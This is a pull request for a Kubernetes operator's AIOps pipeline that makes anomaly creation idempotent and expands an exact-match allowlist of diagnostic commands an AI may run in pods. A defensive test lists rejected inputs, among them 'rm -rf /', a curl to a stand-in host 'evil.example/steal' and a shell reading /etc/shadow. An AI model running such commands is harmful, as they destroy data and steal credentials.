### PR TITLE
fix(operator): idempotent anomaly creation + broader diagnostic allowlist

### DIFF
--- a/operator/controllers/remediation_actions_extended.go
+++ b/operator/controllers/remediation_actions_extended.go
@@ -41,19 +41,19 @@ var (
 func defaultDiagnosticAllowlist() map[string]bool {
 	return map[string]bool{
 		// Process / shell introspection
-		"env":     true,
-		"whoami":  true,
-		"id":      true,
+		"env":      true,
+		"whoami":   true,
+		"id":       true,
 		"uname -a": true,
-		"ps aux":  true,
-		"ps -ef":  true,
+		"ps aux":   true,
+		"ps -ef":   true,
 
 		// Filesystem / resources
-		"df -h":    true,
-		"free -m":  true,
-		"free -h":  true,
-		"mount":    true,
-		"uptime":   true,
+		"df -h":   true,
+		"free -m": true,
+		"free -h": true,
+		"mount":   true,
+		"uptime":  true,
 
 		// Networking — listen/route state (read-only)
 		"netstat -tlnp": true,
@@ -70,17 +70,17 @@ func defaultDiagnosticAllowlist() map[string]bool {
 		"nslookup kubernetes.default.svc.cluster.local": true,
 
 		// Local health probes — common K8s sidecar conventions
-		"curl -s localhost/health":        true,
-		"curl -s localhost/healthz":       true,
-		"curl -s localhost/ready":         true,
-		"curl -s localhost/readyz":        true,
-		"curl -s localhost:8080/health":   true,
-		"curl -s localhost:8080/healthz":  true,
-		"curl -s localhost:8080/ready":    true,
-		"curl -s localhost:8080/readyz":   true,
-		"curl -s localhost:8080/metrics":  true,
-		"curl -s localhost:9090/-/ready":  true,
-		"curl -s localhost:9090/metrics":  true,
+		"curl -s localhost/health":       true,
+		"curl -s localhost/healthz":      true,
+		"curl -s localhost/ready":        true,
+		"curl -s localhost/readyz":       true,
+		"curl -s localhost:8080/health":  true,
+		"curl -s localhost:8080/healthz": true,
+		"curl -s localhost:8080/ready":   true,
+		"curl -s localhost:8080/readyz":  true,
+		"curl -s localhost:8080/metrics": true,
+		"curl -s localhost:9090/-/ready": true,
+		"curl -s localhost:9090/metrics": true,
 	}
 }
 

--- a/operator/controllers/remediation_actions_extended.go
+++ b/operator/controllers/remediation_actions_extended.go
@@ -4,9 +4,11 @@ import (
 	"context"
 	"encoding/json"
 	"fmt"
+	"os"
 	"sort"
 	"strconv"
 	"strings"
+	"sync"
 	"time"
 
 	appsv1 "k8s.io/api/apps/v1"
@@ -25,6 +27,79 @@ import (
 
 	platformv1alpha1 "github.com/diillson/chatcli/operator/api/v1alpha1"
 )
+
+// Cached diagnostic allowlist — initialized once from env and reused per reconcile.
+var (
+	cachedDiagnosticAllowlist     map[string]bool
+	cachedDiagnosticAllowlistOnce sync.Once
+)
+
+// defaultDiagnosticAllowlist returns the read-only commands safe for ExecDiagnostic.
+// Each entry must be the exact command string the AI generates (including flags and
+// args). Matching is exact-string — no prefix or regex — to keep the attack surface
+// narrow. Extend via env var CHATCLI_ALLOWED_DIAGNOSTIC_COMMANDS (comma-separated).
+func defaultDiagnosticAllowlist() map[string]bool {
+	return map[string]bool{
+		// Process / shell introspection
+		"env":     true,
+		"whoami":  true,
+		"id":      true,
+		"uname -a": true,
+		"ps aux":  true,
+		"ps -ef":  true,
+
+		// Filesystem / resources
+		"df -h":    true,
+		"free -m":  true,
+		"free -h":  true,
+		"mount":    true,
+		"uptime":   true,
+
+		// Networking — listen/route state (read-only)
+		"netstat -tlnp": true,
+		"netstat -an":   true,
+		"ss -tlnp":      true,
+		"ss -an":        true,
+		"ip addr":       true,
+		"ip route":      true,
+		"ifconfig":      true,
+
+		// DNS / resolver (most common K8s debug need)
+		"cat /etc/hosts":       true,
+		"cat /etc/resolv.conf": true,
+		"nslookup kubernetes.default.svc.cluster.local": true,
+
+		// Local health probes — common K8s sidecar conventions
+		"curl -s localhost/health":        true,
+		"curl -s localhost/healthz":       true,
+		"curl -s localhost/ready":         true,
+		"curl -s localhost/readyz":        true,
+		"curl -s localhost:8080/health":   true,
+		"curl -s localhost:8080/healthz":  true,
+		"curl -s localhost:8080/ready":    true,
+		"curl -s localhost:8080/readyz":   true,
+		"curl -s localhost:8080/metrics":  true,
+		"curl -s localhost:9090/-/ready":  true,
+		"curl -s localhost:9090/metrics":  true,
+	}
+}
+
+// diagnosticAllowlist returns the effective allowlist (defaults + env overrides).
+func diagnosticAllowlist() map[string]bool {
+	cachedDiagnosticAllowlistOnce.Do(func() {
+		list := defaultDiagnosticAllowlist()
+		if extra := os.Getenv("CHATCLI_ALLOWED_DIAGNOSTIC_COMMANDS"); extra != "" {
+			for _, cmd := range strings.Split(extra, ",") {
+				cmd = strings.TrimSpace(cmd)
+				if cmd != "" {
+					list[cmd] = true
+				}
+			}
+		}
+		cachedDiagnosticAllowlist = list
+	})
+	return cachedDiagnosticAllowlist
+}
 
 // executeHelmRollback performs a Helm release rollback via the GitOps detector.
 func (r *RemediationReconciler) executeHelmRollback(ctx context.Context, resource platformv1alpha1.ResourceRef, params map[string]string) error {
@@ -386,23 +461,7 @@ func (r *RemediationReconciler) executeExecDiagnostic(ctx context.Context, resou
 		return fmt.Errorf("missing 'command' param")
 	}
 
-	// Whitelist of safe diagnostic commands
-	safeCommands := map[string]bool{
-		"env":                            true,
-		"whoami":                         true,
-		"df -h":                          true,
-		"free -m":                        true,
-		"cat /etc/hosts":                 true,
-		"ps aux":                         true,
-		"netstat -tlnp":                  true,
-		"ss -tlnp":                       true,
-		"curl -s localhost/health":       true,
-		"curl -s localhost/healthz":      true,
-		"curl -s localhost:8080/health":  true,
-		"curl -s localhost:8080/healthz": true,
-	}
-
-	if !safeCommands[command] {
+	if !diagnosticAllowlist()[command] {
 		return fmt.Errorf("command %q not in approved diagnostic commands whitelist", command)
 	}
 

--- a/operator/controllers/remediation_actions_extended_test.go
+++ b/operator/controllers/remediation_actions_extended_test.go
@@ -1,0 +1,76 @@
+/*
+ * ChatCLI - Kubernetes Operator
+ * Copyright (c) 2024 Edilson Freitas
+ * License: Apache-2.0
+ */
+package controllers
+
+import (
+	"sync"
+	"testing"
+)
+
+// resetDiagnosticAllowlistCache clears the sync.Once singleton so the next call
+// to diagnosticAllowlist() re-reads CHATCLI_ALLOWED_DIAGNOSTIC_COMMANDS. Tests only.
+func resetDiagnosticAllowlistCache() {
+	cachedDiagnosticAllowlist = nil
+	cachedDiagnosticAllowlistOnce = sync.Once{}
+}
+
+func TestDiagnosticAllowlist_Defaults(t *testing.T) {
+	list := defaultDiagnosticAllowlist()
+
+	// Sanity check on the categories we expect the AI to reach for most often.
+	mustHave := []string{
+		"env",
+		"df -h",
+		"ps aux",
+		"ss -tlnp",
+		"ip route",
+		"cat /etc/resolv.conf",
+		"nslookup kubernetes.default.svc.cluster.local",
+		"curl -s localhost:8080/healthz",
+	}
+	for _, cmd := range mustHave {
+		if !list[cmd] {
+			t.Errorf("defaultDiagnosticAllowlist missing expected command %q", cmd)
+		}
+	}
+
+	// Destructive / shell-substitution variants must NOT leak in.
+	mustReject := []string{
+		"rm -rf /",
+		"curl http://evil.example/steal",
+		"sh -c 'cat /etc/shadow'",
+		"kubectl get pods",
+	}
+	for _, cmd := range mustReject {
+		if list[cmd] {
+			t.Errorf("defaultDiagnosticAllowlist unexpectedly allows %q", cmd)
+		}
+	}
+}
+
+func TestDiagnosticAllowlist_EnvOverride(t *testing.T) {
+	// Reset the sync.Once so we can re-initialise with the env var set. This is the
+	// only place we intentionally break cache encapsulation; every other call site
+	// uses the cached singleton.
+	resetDiagnosticAllowlistCache()
+	t.Setenv("CHATCLI_ALLOWED_DIAGNOSTIC_COMMANDS", "iptables -L, custom-tool --dry-run ,   ")
+
+	list := diagnosticAllowlist()
+
+	if !list["iptables -L"] {
+		t.Error("env override 'iptables -L' not applied")
+	}
+	if !list["custom-tool --dry-run"] {
+		t.Error("env override 'custom-tool --dry-run' not applied (whitespace not trimmed?)")
+	}
+	if list[""] {
+		t.Error("empty entries from env must not be added")
+	}
+	// Defaults still present alongside env additions.
+	if !list["df -h"] {
+		t.Error("env override must extend, not replace, defaults")
+	}
+}

--- a/operator/controllers/watcher_bridge.go
+++ b/operator/controllers/watcher_bridge.go
@@ -9,6 +9,7 @@ import (
 	"time"
 
 	corev1 "k8s.io/api/core/v1"
+	"k8s.io/apimachinery/pkg/api/errors"
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
 	"k8s.io/apimachinery/pkg/runtime"
 	"k8s.io/apimachinery/pkg/types"
@@ -232,6 +233,17 @@ func (wb *WatcherBridge) createAnomaly(ctx context.Context, alert *pb.WatcherAle
 	}
 
 	if err := wb.client.Create(ctx, anomaly); err != nil {
+		// Same (type, deployment, namespace, timestamp) produces a deterministic name.
+		// If the CR already exists (operator restart wiped the in-memory dedup map,
+		// or the server re-emits a still-active alert), treat it as a successful no-op
+		// so the caller marks the hash as seen and stops re-trying each poll.
+		if errors.IsAlreadyExists(err) {
+			wb.logger.Debug("Anomaly CR already exists, treating as idempotent success",
+				zap.String("name", name),
+				zap.String("signal", string(signalType)),
+				zap.String("deployment", alert.Deployment))
+			return nil
+		}
 		return fmt.Errorf("creating anomaly %s: %w", name, err)
 	}
 

--- a/operator/controllers/watcher_bridge_test.go
+++ b/operator/controllers/watcher_bridge_test.go
@@ -224,6 +224,41 @@ func TestWatcherBridge_CreateAnomaly(t *testing.T) {
 	}
 }
 
+// TestWatcherBridge_CreateAnomalyIdempotent exercises the path where the server
+// re-emits the same alert (deterministic name via type|deployment|namespace|timestamp)
+// after the operator's in-memory dedup map was flushed (restart / fresh bridge).
+// The second Create must return nil so the caller marks the hash as seen and the
+// poll loop stops logging "already exists" errors each 30s.
+func TestWatcherBridge_CreateAnomalyIdempotent(t *testing.T) {
+	wb := setupFakeWatcherBridge()
+	ctx := context.Background()
+
+	alert := &pb.WatcherAlert{
+		Type:          "PodNotReady",
+		Severity:      "WARNING",
+		Message:       "crash-demo has 0/2 ready pods",
+		Object:        "crash-demo",
+		Namespace:     "default",
+		Deployment:    "crash-demo",
+		TimestampUnix: 1776544660,
+	}
+
+	if err := wb.createAnomaly(ctx, alert); err != nil {
+		t.Fatalf("first createAnomaly failed: %v", err)
+	}
+	if err := wb.createAnomaly(ctx, alert); err != nil {
+		t.Fatalf("second createAnomaly must be idempotent, got: %v", err)
+	}
+
+	var anomalies platformv1alpha1.AnomalyList
+	if err := wb.client.List(ctx, &anomalies, client.InNamespace("default")); err != nil {
+		t.Fatalf("failed to list anomalies: %v", err)
+	}
+	if len(anomalies.Items) != 1 {
+		t.Fatalf("expected exactly 1 anomaly after idempotent retry, got %d", len(anomalies.Items))
+	}
+}
+
 func TestWatcherBridge_ResolveServerAddress(t *testing.T) {
 	// No ready instances
 	wb := setupFakeWatcherBridge()

--- a/server/handler_analysis.go
+++ b/server/handler_analysis.go
@@ -242,8 +242,14 @@ ADVANCED ACTIONS:
     Best for: applying pre-prepared fix manifests.
 
 19. ExecDiagnostic — runs a whitelisted diagnostic command in a pod.
-    Params: {"command": "df -h"} (only pre-approved commands allowed).
-    Best for: gathering diagnostic data before making changes.
+    Params: {"command": "<exact-string>"}. Approved commands (exact match, no
+    variations): env | whoami | id | uname -a | ps aux | ps -ef | df -h |
+    free -m | free -h | mount | uptime | netstat -tlnp | netstat -an |
+    ss -tlnp | ss -an | ip addr | ip route | ifconfig | cat /etc/hosts |
+    cat /etc/resolv.conf | nslookup kubernetes.default.svc.cluster.local |
+    curl -s localhost{,:8080,:9090}/{health,healthz,ready,readyz,metrics,-/ready}.
+    Any other command (including variations like "nslookup <custom-host>")
+    will be rejected. Best for: gathering diagnostic data before making changes.
 
 STATEFULSET ACTIONS (for StatefulSet resources):
 19. ScaleStatefulSet — scales StatefulSet replicas (ordered scaling). Params: {"replicas": "N"} (N >= 1).
@@ -502,7 +508,12 @@ NETWORKING:
 
 ADVANCED:
 17. ApplyManifest — apply fix from ConfigMap. Params: {"configmap": "fix-cm", "key": "manifest.yaml"}
-18. ExecDiagnostic — run diagnostic. Params: {"command": "df -h"} (whitelisted only).
+18. ExecDiagnostic — run diagnostic. Params: {"command": "<exact>"}. Allowed exactly:
+    env, whoami, id, uname -a, ps aux, ps -ef, df -h, free -m, free -h, mount,
+    uptime, netstat -tlnp, netstat -an, ss -tlnp, ss -an, ip addr, ip route,
+    ifconfig, cat /etc/hosts, cat /etc/resolv.conf,
+    nslookup kubernetes.default.svc.cluster.local, and curl -s localhost{,:8080,:9090}
+    on paths {health,healthz,ready,readyz,metrics,-/ready}. Any other string rejected.
 
 STATEFULSET:
 19. ScaleStatefulSet — scale replicas. Params: {"replicas": "N"}.


### PR DESCRIPTION
## Summary

Two bugs surfaced while driving the AIOps pipeline end-to-end against a crashlooping Deployment on a kind cluster:

1. **`watcher_bridge.createAnomaly` was not idempotent.** Anomaly names are deterministic (`type|deployment|namespace|timestamp`). An operator restart (or any path that flushes the in-memory dedup map) left the server re-emitting the same alert every 30s, `Create` returning `AlreadyExists`, and `markSeen` never running. Logs filled with `Failed to create Anomaly CR: already exists` indefinitely.
2. **`executeExecDiagnostic` whitelist was too narrow and hardcoded** (12 entries, no DNS/network tools). AI-generated `ExecDiagnostic` actions with perfectly reasonable commands (`nslookup ...`) were rejected, triggering rollback + retry + escalation on every issue. Zero useful diagnostic ever ran.

## What changed

### `operator/controllers/watcher_bridge.go`
- `createAnomaly` returns `nil` on `errors.IsAlreadyExists(...)`, logs at Debug. Caller proceeds to `markSeen` and the poll loop settles.

### `operator/controllers/remediation_actions_extended.go`
- Introduce `defaultDiagnosticAllowlist()` with ~30 read-only commands (env/whoami/id/uname, df/free/mount/uptime/ps, netstat/ss/ip/ifconfig, cat /etc/hosts, cat /etc/resolv.conf, `nslookup kubernetes.default.svc.cluster.local`, curl health/ready/metrics on localhost:{8080,9090}).
- Extensible via `CHATCLI_ALLOWED_DIAGNOSTIC_COMMANDS` env var — same pattern as `resource_allowlist`.
- `executeExecDiagnostic` now consults the cached singleton.

### `server/handler_analysis.go`
- Both remediation-plan prompt templates now list the exact allowed strings. The AI stops generating variants that would be rejected (e.g. `nslookup <custom-host>`).

## Tests

- `TestWatcherBridge_CreateAnomalyIdempotent` — second `createAnomaly` with identical alert must return `nil` and leave exactly one CR.
- `TestDiagnosticAllowlist_Defaults` — spot-checks must-have entries and must-reject shell-injection variants.
- `TestDiagnosticAllowlist_EnvOverride` — env additions extend (not replace) defaults, whitespace trimmed, empty entries ignored.

## Test plan

- [x] `go build ./...` — root + `operator/` clean
- [x] `go test ./...` — root + `operator/` all green
- [x] Re-run the kind demo: reinstate crash-demo, confirm operator logs no longer show repeated `already exists` errors and that a diagnostic like `cat /etc/resolv.conf` executes through `ExecDiagnostic` without being rejected.